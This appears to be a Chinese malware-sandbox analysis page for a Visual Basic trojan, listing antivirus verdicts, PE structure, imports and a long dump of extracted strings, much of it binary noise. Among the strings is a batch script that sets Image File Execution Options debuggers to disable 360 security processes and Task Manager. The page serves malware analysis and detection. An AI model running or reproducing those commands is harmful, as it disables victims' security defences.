1.1
低危
63 个模型检测该样本为恶意!
重新分析
更多

17aafaaa895167f4a1b4cdfc535035bbcb640407a69ffe7393fe32caeadd39dc

17aafaaa895167f4a1b4cdfc535035bbcb640407a69ffe7393fe32caeadd39dc.exe

分析耗时

194s

最近分析

366天前

文件大小

119.1KB
静态报毒 动态报毒 CVE FAMILY METATYPE PLATFORM TYPE UNKNOWN WIN32 TROJAN FSYSNA
鹰眼引擎
DACN 0.12
FACILE 1.00
IMCLNet 0.61
MFGraph 0.00
静态判定
反病毒引擎
查杀引擎 查杀结果 查杀时间 查杀版本
Alibaba None 20190527 0.3.0.5
Avast Win32:Malware-gen 20200217 18.4.3895.0
Baidu None 20190318 1.0.0.2
CrowdStrike win/malicious_confidence_80% (D) 20190702 1.0
Kingsoft None 20200219 2013.8.14.323
McAfee Trojan-FQXU!73426C9C7D6C 20200217 6.0.6.653
Tencent Malware.Win32.Gencirc.10b3cff1 20200219 1.0.0.1
静态指标
行为判定
动态指标
在 PE 资源中识别到外语 (1 个事件)
name RT_VERSION language LANG_CHINESE filetype None sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x0000a9a4 size 0x0000024c
网络通信
与未执行 DNS 查询的主机进行通信 (1 个事件)
host 114.114.114.114
文件已被 VirusTotal 上 63 个反病毒引擎识别为恶意 (50 out of 63 个事件)
APEX Malicious
AVG Win32:Malware-gen
Acronis suspicious
Ad-Aware Trojan.Agent.DVQW
AhnLab-V3 Trojan/Win32.Fsysna.R269415
Antiy-AVL Trojan/Win32.Fsysna.FCCR
Arcabit Trojan.Agent.DVQW
Avast Win32:Malware-gen
Avira TR/Dropper.Gen
BitDefender Trojan.Agent.DVQW
BitDefenderTheta AI:Packer.83D799671F
Bkav W32.AIDetectVM.malware
CAT-QuickHeal Trojan.FsysnaVMF.S7094755
ClamAV Win.Malware.Fsysna-7004456-0
Comodo TrojWare.Win32.Ditertag.DI@8k2up6
CrowdStrike win/malicious_confidence_80% (D)
Cybereason malicious.c7d6c6
Cylance Unsafe
Cyren W32/Fsysna.E.gen!Eldorado
DrWeb Trojan.KillFiles.64121
ESET-NOD32 Win32/KillFiles.A
Emsisoft Trojan.Agent.DVQW (B)
Endgame malicious (high confidence)
F-Prot W32/Fsysna.E.gen!Eldorado
F-Secure Trojan.TR/Dropper.Gen
FireEye Generic.mg.73426c9c7d6c6a60
Fortinet W32/Fsysna.FCCR!tr
GData Trojan.Agent.DVQW
Ikarus Trojan.Agent
Invincea heuristic
Jiangmin Trojan.Fsysna.kfk
K7AntiVirus Trojan ( 0000bbc81 )
K7GW Trojan ( 0000bbc81 )
Kaspersky Trojan.Win32.Fsysna.fcpq
Lionic Trojan.Win32.Fsysna.tpPg
MAX malware (ai score=80)
Malwarebytes Hijack.AssocExt
MaxSecure Trojan.Fsysna.fcpq
McAfee Trojan-FQXU!73426C9C7D6C
McAfee-GW-Edition BehavesLike.Win32.SuspiciousDel.cm
MicroWorld-eScan Trojan.Agent.DVQW
Microsoft Trojan:Win32/Musecador
NANO-Antivirus Trojan.Win32.Fsysna.fpivmo
Panda Trj/Genetic.gen
Qihoo-360 HEUR/QVM03.0.589D.Malware.Gen
Rising Worm.KillFile!1.B91B (CLASSIC)
SUPERAntiSpyware Trojan.Agent/Gen-Injector
Sangfor Malware
SentinelOne DFI - Malicious PE
Sophos Troj/VB-KOX
可视化分析
二进制图像
数据导入图像 288x288
数据导入图像 224x224
数据导入图像 192x192
数据导入图像 160x160
数据导入图像 128x128
数据导入图像 96x96
数据导入图像 64x64
数据导入图像 32x32
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

2019-04-20 18:22:04

PE Imphash

d2bf2bc66c5e49a85254cd29b19046bd

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00001000 0x00007df0 0x00008000 6.058616924670466
.data 0x00009000 0x00000b40 0x00001000 0.0
.rsrc 0x0000a000 0x00001000 0x00001000 4.416328167746471

Resources

Name Offset Size Language Sub-language File type
RT_ICON 0x0000a0e8 0x000008a8 LANG_NEUTRAL SUBLANG_NEUTRAL None
RT_GROUP_ICON 0x0000a990 0x00000014 LANG_NEUTRAL SUBLANG_NEUTRAL None
RT_VERSION 0x0000a9a4 0x0000024c LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED None

Imports

Library MSVBVM60.DLL:
0x401000 _CIcos
0x401004 _adj_fptan
0x401008 __vbaStrI4
0x40100c __vbaVarMove
0x401010 __vbaAryMove
0x401014 __vbaFreeVar
0x401018 __vbaStrVarMove
0x40101c __vbaLenBstr
0x401020 __vbaFreeVarList
0x401024 __vbaEnd
0x401028 _adj_fdiv_m64
0x40102c __vbaFreeObjList
0x401030 _adj_fprem1
0x401034 __vbaStrCat
0x401038 __vbaError
0x40103c __vbaSetSystemError
0x401044 _adj_fdiv_m32
0x401048 __vbaAryDestruct
0x40104c __vbaExitProc
0x401050 __vbaVarForInit
0x401054 None
0x401058 None
0x40105c __vbaObjSet
0x401060 __vbaOnError
0x401064 _adj_fdiv_m16i
0x401068 _adj_fdivr_m16i
0x40106c None
0x401070 _CIsin
0x401074 __vbaErase
0x401078 __vbaChkstk
0x40107c __vbaGosubFree
0x401080 __vbaFileClose
0x401084 EVENT_SINK_AddRef
0x40108c None
0x401090 __vbaAryConstruct2
0x401094 __vbaPutOwner4
0x401098 __vbaI2I4
0x40109c DllFunctionCall
0x4010a0 __vbaFpUI1
0x4010a4 __vbaRedimPreserve
0x4010a8 __vbaStrR4
0x4010ac _adj_fpatan
0x4010b4 None
0x4010b8 __vbaRedim
0x4010bc EVENT_SINK_Release
0x4010c0 __vbaNew
0x4010c4 None
0x4010c8 __vbaUI1I2
0x4010cc _CIsqrt
0x4010d4 __vbaUI1I4
0x4010d8 __vbaExceptHandler
0x4010dc __vbaPrintFile
0x4010e0 __vbaStrToUnicode
0x4010e4 None
0x4010e8 _adj_fprem
0x4010ec _adj_fdivr_m64
0x4010f0 __vbaGosub
0x4010f4 None
0x4010f8 __vbaFPException
0x4010fc None
0x401100 __vbaGetOwner3
0x401104 __vbaStrVarVal
0x401108 __vbaVarCat
0x40110c __vbaGetOwner4
0x401110 __vbaI2Var
0x401114 __vbaLsetFixstrFree
0x401118 None
0x40111c _CIlog
0x401120 __vbaErrorOverflow
0x401124 __vbaFileOpen
0x401128 __vbaVar2Vec
0x40112c __vbaNew2
0x401130 None
0x401134 None
0x401138 None
0x40113c _adj_fdiv_m32i
0x401140 _adj_fdivr_m32i
0x401144 None
0x401148 __vbaStrCopy
0x40114c __vbaVarSetObj
0x401150 __vbaFreeStrList
0x401154 __vbaDerefAry1
0x401158 _adj_fdivr_m32
0x40115c _adj_fdiv_r
0x401160 None
0x401164 None
0x401168 __vbaVarTstNe
0x40116c None
0x401170 __vbaI4Var
0x401174 __vbaVarAdd
0x401178 __vbaAryLock
0x40117c __vbaVarDup
0x401180 __vbaStrToAnsi
0x401188 __vbaFpI4
0x40118c __vbaVarCopy
0x401190 None
0x401198 _CIatan
0x40119c __vbaStrMove
0x4011a0 __vbaStrVarCopy
0x4011a4 _allmul
0x4011a8 __vbaLenVarB
0x4011ac _CItan
0x4011b0 __vbaAryUnlock
0x4011b4 __vbaFPInt
0x4011b8 __vbaVarForNext
0x4011bc _CIexp
0x4011c0 __vbaFreeStr
0x4011c4 __vbaFreeObj
L!This program cannot be run in DOS mode.
#BBBL^B`BdBRichB
`.data
MSVBVM60.DLL
rjrbrrr
rvjrNr:
rrbr*<r}Artr
rr4ur9
r}irWr!NrwrSr+rgr
=r:r7ruBr
Vr2Cr:
rJlrr
rrar5r
r$br/Nrwr
rrpurkrmrIrr0lrF
yE81$HH
M%-:O3f
2.X By:znkzz
S!!#uR
zzzzzzzz
zzzzzzz
zzzzzzzz
zUzzyQz
zzzzzzzzz-
zzzzzzzz-
zzzzzzzzz
zzzzzzzzzzz
zzzzzzzzf
zzzzzzzG
zzzzzzzzz
zzzzzzzzzzzz
Timer2
Timer1
Label3
@echo off
reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\ZhuDongFangYu.exe" /v debugger /t reg_sz /d "ntsd -d" /f
reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\360tray.exe" /v debugger /t reg_sz /d "ntsd -d" /f
reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\taskmgr.exe" /v debugger /t reg_sz /d "ntsd -d" /f
Label2
Label1
Label1
yE81$H
VB5!6&vb6chs.dll
zE!~@Jke
Class1
yE81$H^pqD
Label1
+3qC:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
Timer1
Timer2
Label2
Label3
user32
keybd_event
GetForegroundWindow
user32.dll
GetWindowTextA
GetWindowTextLengthA
FindWindowA
SetWindowTextA
SearchFiles
getCaption
+3q"=h
+3qhJu
+3qClass
C:\windows\SysWow64\MSVBVM60.DLL\3
RegisterA
RegisterB
RegisterC
RegisterD
Md5_String_Calc
Md5_File_Calc
GetValues
MD5Init
MD5Final
MD5Update
LongLeftRotate
__vbaVarSetObjAddref
VBA6.DLL
__vbaStrVarVal
__vbaVarCopy
__vbaStrToUnicode
__vbaStrToAnsi
__vbaSetSystemError
__vbaLsetFixstrFree
__vbaVarForNext
__vbaFpI4
__vbaFPInt
__vbaStrR4
__vbaVarLateMemCallLd
__vbaNew
__vbaVarSetObj
__vbaPutOwner4
__vbaStrVarCopy
__vbaPrintFile
__vbaI2Var
__vbaVarForInit
__vbaFileClose
__vbaGetOwner4
__vbaRedim
__vbaFileOpen
__vbaEnd
__vbaFreeObjList
__vbaNew2
__vbaVarDup
__vbaOnError
__vbaFixstrConstruct
__vbaErrorOverflow
__vbaAryDestruct
__vbaFreeVarList
__vbaAryUnlock
__vbaAryLock
__vbaFreeStrList
__vbaVarTstNe
__vbaFreeObj
__vbaHresultCheckObj
__vbaObjSet
__vbaVarMove
__vbaError
__vbaFreeStr
__vbaDerefAry1
__vbaStrCopy
__vbaI4Var
__vbaRedimPreserve
__vbaVarAdd
__vbaLenBstr
__vbaFreeVar
__vbaStrCat
__vbaStrMove
__vbaI2I4
__vbaUI1I2
__vbaAryConstruct2
__vbaFpUI1
__vbaVarCat
__vbaStrVarMove
__vbaUI1I4
__vbaVar2Vec
__vbaGosubFree
__vbaExitProc
__vbaGetOwner3
__vbaGosub
__vbaErase
__vbaLenVarB
__vbaAryMove
__vbaGenerateBoundsError
__vbaStrI4
FileType
SourceString
InFile
InputLen
InputBuffer
}}}}}}}|l\EWEPE
EPlPEPt
MJSEP.PSj
M3EPPu
lXEP@Puy0@X
XP7M)j
tSlPEP
XMfXf9X
#fXEPEPj
EPlPEPt
MSEPPSj
MEPPux
uEPEPj
SEP*L]L9E
MEPHEPEPj
MX|PEPj
} jdh<3@
hPEPEPE
} jPh3@
} jXh3@
MEPEPEPEPj
hPfEhOE
uujj E
MhPEPEPE
HP8P(PPPEP|
P|PEPEP9P
P|PDEPEPP
jj MmE
;PEP7E
PxP8PHP(PP
PPPPPPPP{PxPhPgj
EPXPJ
M9hPxPPPPPPPPP
PHP8PXPhPj
PxPx|x
} jPh3@
} jXh3@
1EPEPEPEPj
EPEPEPEPj
XPhPxPPPPPPPPP
P(P8PHPXPhPj
LSVWeE
VuEPgP3
EPHM`EUM
McM+MS
PEPDEEPE
jTh,3@
jPh,3@
EP@Pu>MDE
SVWeEP
SVWeE`
M_h6]@
SVWeEp
MKhJ^@
TSVWeE
]]]]P8;}
VPHEPEP
P$MQMQE
j@WVPM
MQVP4;}
UM]h_@
EP3S#EPS
j\XXSVWeE
PPuVj@YE
M/M'MO
HSVWeE
VEPEP}}}
EWEPEP+P
WVEPEP]E
MJEPEP
3EPEPj
4SVWeE
QV}}}}
QVPLuuB
EPEPEPEPEPEPj
EPEPEPEPEPEPj
E_EEPE
P]}u-EPEPEP"P"
MEPEPj
>EEEPE
Es^uS'EEEEPEP}u;EPEPEP0P0
MEPEPEPj
EEEEPEP}uEPEPEP
EEEEPEP}u1EPEPEP&P&
MEPEPEPj
EEEEPEP}u
EPEPEP
EEPEP}u
EPEPEP
EPEPEPj
EEPEP}unEPEPEPcPc
M)EPEPj
EPEPEPj
SVWeE0
MQMQ}}]V}~PPp
MQMQVPp
MQMQVPp
MQMQVPpFDMH
XSVWeE8
EP]]]]
EEj@_]E
jxX+MQM
MQMQVPpM
MQMQVPpE]E=
MQMQVPpE]E=
MQMQVPpE]E=
MQMEQE
VPOhl@
LSVWeEH
NPj@_e
f;EE~]
E\f;EE
VPPfEf
HSVWeEP
EEEEEEEEh9@
MQEMEQE
MQMQMQu
MQMQMQMQVExjE
MQMQMQM
QMQMQMQMQEVE
MQMQMQM
QMQMQMQMQVEp $]PXj
MQMQMQM
QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQME*
QMQMQMQMQVPX
MQMQMQM
QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQM
$QMQMQMQMQVPX
MQMQMQM
(QMQMQMQMQVE[]PX
MQMQMQM
,QMQMQMQMQVE\}PX
MQMQMQM
0QMQMQME"
QMQVPX
MQMQMQM
4QMQMQMQMQVEqE
MQMQMQM
8QMQMQMQMQVECy]PX
MQMQMQM
<QMQMQMQMQVE!
MQMQMQMEb%
QMQMQMQMQVP\
MQMQMQM
QMQMQMQMQVE@@E
MQMQMQM
,QMQMQMQMQVEQZ^&]P\j
MQMQMQu
MQMQMQMQVE
MQMQMQM
QMQMQMQMQVP\
MQMQMQM
(QMQMQMQMQVES
MQMQMQM
<QMQMQMQMQVE
MQMQMQM
QMQMQE}MQMQVP\
MQMQMQM
$QMQMQMQMQVE!E
MQMQMQM
8QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQME
ZE} QMQMQMQMQVP\
MQMQMQM
4QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVEE
MQMQMQM
QMQMQMQMQVE
EL*}MQMQMQM
0QMQMQMQMQVP\j
MQMQMQM
QMQMQMQMQVEB9]P`
MQMQMQM
QMQMQMQMQVEqE
_MQMQMQM
,QME"am}QMQMQMQVP`
MQMQMQM
8QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVED
MQMQMQM
QMQMQMQMQVEKE
MQME`K}QMQM
QMQMQMQMQVP`
MQMQMQM
(QMQMQMQMQVEpE
MQMQMQM
4QMQMQMQMQVE~(]P`
MQMQMQu
MQMQMQMQVE'E
MQMQMQM
QMQMQMQMQVP`
MQMQMQM
QMQMQMQMQVE
MQMQMQM
$QMQMQMQMQVE9
MQMQMQM
0QMQMQEE
MQMQVP`
MQMQMQM
<QMQMQMQMQVE|}P`
MQMQMQM
QMQMQMQMQVEeVE
MQMQMQu
MQMQMQMQVED")E
MQMQMQM
QMQMQMQMQVPd
MQMQMQM
8QMQMQMQMQVE#E
MQMQMQM
QMQMQMQMQVE9E
MQMQMQM
0QMQMQMQMQVEY[eE
QMQMQM
QMQMQMQMQVPd
MQMQMQM
(QMQMQMQMQVE}E
MQMQMQM
QMQMQMQMQVE]E
MQMQMQM
QMQMQMQMEO~oE
MQMQMQM
<QMQMQMQMQVE,E
MQMQMQM
QMQMQMQMQVE
MQMQMQM
4QMQMQMQMQVE
MQMQMQM
MQMQMQMQVPd
MQMQMQM
,QMQMQMQMQVE5:E
MQMQMQM
QMQMQMQMQVE*E
MQMQMQM
$QMQMQMQMQVE
MQMQND
QVPhFDMH
MQMQND
QVPhFDMH
MQMQND
QVPhFDMH
MQMQND
QVPhFDMH
S3Wf8f
f;]]]]
QWVPlEM
QWVPlEM
QWVPlEM
QWVPlEM
SVWeE`
V3EEEE
MSVBVM60.DLL
_CIcos
_adj_fptan
__vbaStrI4
__vbaVarMove
__vbaAryMove
__vbaFreeVar
__vbaStrVarMove
__vbaLenBstr
__vbaFreeVarList
__vbaEnd
_adj_fdiv_m64
__vbaFreeObjList
_adj_fprem1
__vbaStrCat
__vbaError
__vbaSetSystemError
__vbaHresultCheckObj
_adj_fdiv_m32
__vbaAryDestruct
__vbaExitProc
__vbaVarForInit
__vbaObjSet
__vbaOnError
_adj_fdiv_m16i
_adj_fdivr_m16i
_CIsin
__vbaErase
__vbaChkstk
__vbaGosubFree
__vbaFileClose
EVENT_SINK_AddRef
__vbaGenerateBoundsError
__vbaAryConstruct2
__vbaPutOwner4
__vbaI2I4
DllFunctionCall
__vbaFpUI1
__vbaRedimPreserve
__vbaStrR4
_adj_fpatan
__vbaFixstrConstruct
__vbaRedim
EVENT_SINK_Release
__vbaNew
__vbaUI1I2
_CIsqrt
EVENT_SINK_QueryInterface
__vbaUI1I4
__vbaExceptHandler
__vbaPrintFile
__vbaStrToUnicode
_adj_fprem
_adj_fdivr_m64
__vbaGosub
__vbaFPException
__vbaGetOwner3
__vbaStrVarVal
__vbaVarCat
__vbaGetOwner4
__vbaI2Var
__vbaLsetFixstrFree
_CIlog
__vbaErrorOverflow
__vbaFileOpen
__vbaVar2Vec
__vbaNew2
_adj_fdiv_m32i
_adj_fdivr_m32i
__vbaStrCopy
__vbaVarSetObj
__vbaFreeStrList
__vbaDerefAry1
_adj_fdivr_m32
_adj_fdiv_r
__vbaVarTstNe
__vbaI4Var
__vbaVarAdd
__vbaAryLock
__vbaVarDup
__vbaStrToAnsi
__vbaVarLateMemCallLd
__vbaFpI4
__vbaVarCopy
__vbaVarSetObjAddref
_CIatan
__vbaStrMove
__vbaStrVarCopy
_allmul
__vbaLenVarB
_CItan
__vbaAryUnlock
__vbaFPInt
__vbaVarForNext
_CIexp
__vbaFreeStr
__vbaFreeObj
S!!#uR
zzzzzzzz
zzzzzzz
zzzzzzzz
zUzzyQz
zzzzzzzzz-
zzzzzzzz-
zzzzzzzzz
zzzzzzzzzzz
zzzzzzzzf
zzzzzzzG
zzzzzzzzz
zzzzzzzzzzzz
C:\Users\Administrator\Desktop\
2.X.pdb
3964344A5F101BBA10AF84388155DFBD
1FD3607D4327B50EB6EDDABE78C6FA87
D1B2D8671EFC317E434137437EEF4A96
370027142FF336DDB2EE9E351C47EDA5
D47BD13313C220FC81E2540FDD038E6A
4C247094201EB65DE12AA17F20575ED9
C0EBB4B8DA3C83D26A8B3D26DD87EF13
3FCA1C597375658EC140D733C9311DA3
2EB0BEC203F15FCAFBE54A3AEB8153C8
C9A73F27A1F08A33401C03AE976C5D7E
B927D056306928EE2117E24E1054A29D
??3@YAXPAX@Z
_wcsicmp
__CxxFrameHandler
wcscpy
wcslen
??2@YAPAXI@Z
wcstok
calloc
wcsstr
_CxxThrowException
_c_exit
_XcptFilter
_cexit
__winitenv
__wgetmainargs
_initterm
__setusermatherr
_adjust_fdiv
__p__commode
__p__fmode
__set_app_type
_except_handler3
msvcrt.dll
??1type_info@@UAE@XZ
_controlfp
?terminate@@YAXXZ
InterlockedIncrement
SetLastError
LocalAlloc
lstrlenW
FormatMessageW
lstrcatW
InterlockedDecrement
WriteConsoleW
GetStdHandle
lstrcpyW
GetLastError
QueryPerformanceCounter
GetTickCount
GetCurrentThreadId
GetCurrentProcessId
GetSystemTimeAsFileTime
TerminateProcess
GetCurrentProcess
UnhandledExceptionFilter
SetUnhandledExceptionFilter
LocalFree
GetModuleHandleA
KERNEL32.dll
wsprintfW
CharUpperW
LoadStringW
USER32.dll
WNetCancelConnection2W
WNetAddConnection2W
WNetGetLastErrorW
MPR.dll
CoTaskMemFree
CoTaskMemAlloc
CoCreateInstance
CoInitializeSecurity
CoInitializeEx
CoUninitialize
ole32.dll
OLEAUT32.dll
GetUserNameExW
Secur32.dll
WS2_32.dll
?GetData@CHString@@IBEPAUCHStringData@@XZ
??1CHString@@QAE@XZ
??4CHString@@QAEABV0@ABV0@@Z
?Mid@CHString@@QBE?AV1@H@Z
?Find@CHString@@QBEHG@Z
?FindOneOf@CHString@@QBEHPBG@Z
??4CHString@@QAEABV0@PBG@Z
??0CHString@@QAE@XZ
?Left@CHString@@QBE?AV1@H@Z
??YCHString@@QAEABV0@PBG@Z
?ReleaseBuffer@CHString@@QAEXH@Z
?GetBufferSetLength@CHString@@QAEPAGH@Z
??0CHString@@QAE@PBG@Z
?Format@CHString@@QAAXPBGZZ
?Compare@CHString@@QBEHPBG@Z
?Mid@CHString@@QBE?AV1@HH@Z
?Empty@CHString@@QAEXXZ
?SetAt@CHString@@QAEXHG@Z
framedyn.dll
NetWkstaTransportEnum
NetApiBufferFree
NetServerGetInfo
NETAPI32.dll
wcschr
strtok
wcstod
wcstol
wcsncmp
_wcsnicmp
realloc
fflush
fprintf
GetComputerNameExW
lstrcmpW
VerifyVersionInfoW
VerSetConditionMask
WideCharToMultiByte
lstrcpynW
FreeLibrary
GetProcAddress
LoadLibraryW
MultiByteToWideChar
ReadConsoleW
ReadFile
SetConsoleMode
GetConsoleMode
lstrcmpiW
FileTimeToSystemTime
GetTimeFormatW
.?AVCHeap_Exception@@
.?AV_com_error@@
D2E192607A17AC6F208337C2E9BD6ED8
5839768A110C2E1AE37D4B30E616A8E0
45D9BE838A5F02E4981469E912784E13
62922761BE57BD6822376BDD882E8512
88D4166C2D8D2F011CDE75124AF9DBDE
611EF0B0E3925FA7E5F2C9A49A3F74CA
5E6CF19822ED79427BBE1F90A46776D2
CF0F1DB2AD1508E38A847901CA6D6925
DD5A2D453888D99E53A6F2A747B16FEF
70715FB211BFEB27C59343934D6520D3
DC09B3988CA83766FA638BD76B3D69BC
F4B27592973B2DACC5CB728AC989760B
B6DEFBDE885C71A317B800A546D04269
7C4B4E11A0F2BC4A2D7ED76F40AA86F8
6A95831DF762742A1F232EB4A7B4BC71
083323F0D069CE9E11EE32193DF3BD9F
8D8245E75AA39808228F46E561D0EB9A
8E8709B31E29265928A9B6D04CFFF260
95ADFDA489635F3AAA1A8F9805686CE0
5417647A06E500065F2E2D598256B533
3F69BCF0B95B0808631680B175AD4D5E
FACA8262DE75016A9AC1BD4204BCEFFF
AC68D3937E744D8987E1E7A87D528A31
7D21374969C2D3C3B9C73950E875950F
6258BFA27674CC353246F35E854EB313
679B9E4CB770DFFD43F09724E2625A5D
585DCB59B27F5478F351CB176D0360A5
E087F1E9711D76EEC32E03B4F7F7488A
FA94434711060770DF67FD82E9AAB89D
529DAB9C6BCC6461A46CD4D0E98F9699
FCCBF1D9BF1649F62ED42B2ECCD04D35
L!This program cannot be run in DOS mode.
#BBBL^B`BdBRichB
`.data
MSVBVM60.DLL
rjrbrrr
rvjrNr:
rrbr*<r}Artr
rr4ur9
r}irWr!NrwrSr+rgr
=r:r7ruBr
Vr2Cr:
rJlrr
rrar5r
r$br/Nrwr
rrpurkrmrIrr0lrF
yE81$HH
M%-:O3f
2.X By:znkzz
S!!#uR
zzzzzzzz
zzzzzzz
zzzzzzzz
zUzzyQz
zzzzzzzzz-
zzzzzzzz-
zzzzzzzzz
zzzzzzzzzzz
zzzzzzzzf
zzzzzzzG
zzzzzzzzz
zzzzzzzzzzzz
Timer2
Timer1
Label3
@echo off
reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\ZhuDongFangYu.exe" /v debugger /t reg_sz /d "ntsd -d" /f
reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\360tray.exe" /v debugger /t reg_sz /d "ntsd -d" /f
reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\taskmgr.exe" /v debugger /t reg_sz /d "ntsd -d" /f
Label2
Label1
Label1
yE81$H
VB5!6&vb6chs.dll
zE!~@Jke
Class1
yE81$H^pqD
Label1
+3qC:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
Timer1
Timer2
Label2
Label3
user32
keybd_event
GetForegroundWindow
user32.dll
GetWindowTextA
GetWindowTextLengthA
FindWindowA
SetWindowTextA
SearchFiles
getCaption
+3q"=h
+3qhJu
+3qClass
C:\windows\SysWow64\MSVBVM60.DLL\3
RegisterA
RegisterB
RegisterC
RegisterD
Md5_String_Calc
Md5_File_Calc
GetValues
MD5Init
MD5Final
MD5Update
LongLeftRotate
__vbaVarSetObjAddref
VBA6.DLL
__vbaStrVarVal
__vbaVarCopy
__vbaStrToUnicode
__vbaStrToAnsi
__vbaSetSystemError
__vbaLsetFixstrFree
__vbaVarForNext
__vbaFpI4
__vbaFPInt
__vbaStrR4
__vbaVarLateMemCallLd
__vbaNew
__vbaVarSetObj
__vbaPutOwner4
__vbaStrVarCopy
__vbaPrintFile
__vbaI2Var
__vbaVarForInit
__vbaFileClose
__vbaGetOwner4
__vbaRedim
__vbaFileOpen
__vbaEnd
__vbaFreeObjList
__vbaNew2
__vbaVarDup
__vbaOnError
__vbaFixstrConstruct
__vbaErrorOverflow
__vbaAryDestruct
__vbaFreeVarList
__vbaAryUnlock
__vbaAryLock
__vbaFreeStrList
__vbaVarTstNe
__vbaFreeObj
__vbaHresultCheckObj
__vbaObjSet
__vbaVarMove
__vbaError
__vbaFreeStr
__vbaDerefAry1
__vbaStrCopy
__vbaI4Var
__vbaRedimPreserve
__vbaVarAdd
__vbaLenBstr
__vbaFreeVar
__vbaStrCat
__vbaStrMove
__vbaI2I4
__vbaUI1I2
__vbaAryConstruct2
__vbaFpUI1
__vbaVarCat
__vbaStrVarMove
__vbaUI1I4
__vbaVar2Vec
__vbaGosubFree
__vbaExitProc
__vbaGetOwner3
__vbaGosub
__vbaErase
__vbaLenVarB
__vbaAryMove
__vbaGenerateBoundsError
__vbaStrI4
FileType
SourceString
InFile
InputLen
InputBuffer
}}}}}}}|l\EWEPE
EPlPEPt
MJSEP.PSj
M3EPPu
lXEP@Puy0@X
XP7M)j
tSlPEP
XMfXf9X
#fXEPEPj
EPlPEPt
MSEPPSj
MEPPux
uEPEPj
SEP*L]L9E
MEPHEPEPj
MX|PEPj
} jdh<3@
hPEPEPE
} jPh3@
} jXh3@
MEPEPEPEPj
hPfEhOE
uujj E
MhPEPEPE
HP8P(PPPEP|
P|PEPEP9P
P|PDEPEPP
jj MmE
;PEP7E
PxP8PHP(PP
PPPPPPPP{PxPhPgj
EPXPJ
M9hPxPPPPPPPPP
PHP8PXPhPj
PxPx|x
} jPh3@
} jXh3@
1EPEPEPEPj
EPEPEPEPj
XPhPxPPPPPPPPP
P(P8PHPXPhPj
LSVWeE
VuEPgP3
EPHM`EUM
McM+MS
PEPDEEPE
jTh,3@
jPh,3@
EP@Pu>MDE
SVWeEP
SVWeE`
M_h6]@
SVWeEp
MKhJ^@
TSVWeE
]]]]P8;}
VPHEPEP
P$MQMQE
j@WVPM
MQVP4;}
UM]h_@
EP3S#EPS
j\XXSVWeE
PPuVj@YE
M/M'MO
HSVWeE
VEPEP}}}
EWEPEP+P
WVEPEP]E
MJEPEP
3EPEPj
4SVWeE
QV}}}}
QVPLuuB
EPEPEPEPEPEPj
EPEPEPEPEPEPj
E_EEPE
P]}u-EPEPEP"P"
MEPEPj
>EEEPE
Es^uS'EEEEPEP}u;EPEPEP0P0
MEPEPEPj
EEEEPEP}uEPEPEP
EEEEPEP}u1EPEPEP&P&
MEPEPEPj
EEEEPEP}u
EPEPEP
EEPEP}u
EPEPEP
EPEPEPj
EEPEP}unEPEPEPcPc
M)EPEPj
EPEPEPj
SVWeE0
MQMQ}}]V}~PPp
MQMQVPp
MQMQVPp
MQMQVPpFDMH
XSVWeE8
EP]]]]
EEj@_]E
jxX+MQM
MQMQVPpM
MQMQVPpE]E=
MQMQVPpE]E=
MQMQVPpE]E=
MQMEQE
VPOhl@
LSVWeEH
NPj@_e
f;EE~]
E\f;EE
VPPfEf
HSVWeEP
EEEEEEEEh9@
MQEMEQE
MQMQMQu
MQMQMQMQVExjE
MQMQMQM
QMQMQMQMQEVE
MQMQMQM
QMQMQMQMQVEp $]PXj
MQMQMQM
QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQME*
QMQMQMQMQVPX
MQMQMQM
QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQM
$QMQMQMQMQVPX
MQMQMQM
(QMQMQMQMQVE[]PX
MQMQMQM
,QMQMQMQMQVE\}PX
MQMQMQM
0QMQMQME"
QMQVPX
MQMQMQM
4QMQMQMQMQVEqE
MQMQMQM
8QMQMQMQMQVECy]PX
MQMQMQM
<QMQMQMQMQVE!
MQMQMQMEb%
QMQMQMQMQVP\
MQMQMQM
QMQMQMQMQVE@@E
MQMQMQM
,QMQMQMQMQVEQZ^&]P\j
MQMQMQu
MQMQMQMQVE
MQMQMQM
QMQMQMQMQVP\
MQMQMQM
(QMQMQMQMQVES
MQMQMQM
<QMQMQMQMQVE
MQMQMQM
QMQMQE}MQMQVP\
MQMQMQM
$QMQMQMQMQVE!E
MQMQMQM
8QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQME
ZE} QMQMQMQMQVP\
MQMQMQM
4QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVEE
MQMQMQM
QMQMQMQMQVE
EL*}MQMQMQM
0QMQMQMQMQVP\j
MQMQMQM
QMQMQMQMQVEB9]P`
MQMQMQM
QMQMQMQMQVEqE
_MQMQMQM
,QME"am}QMQMQMQVP`
MQMQMQM
8QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVED
MQMQMQM
QMQMQMQMQVEKE
MQME`K}QMQM
QMQMQMQMQVP`
MQMQMQM
(QMQMQMQMQVEpE
MQMQMQM
4QMQMQMQMQVE~(]P`
MQMQMQu
MQMQMQMQVE'E
MQMQMQM
QMQMQMQMQVP`
MQMQMQM
QMQMQMQMQVE
MQMQMQM
$QMQMQMQMQVE9
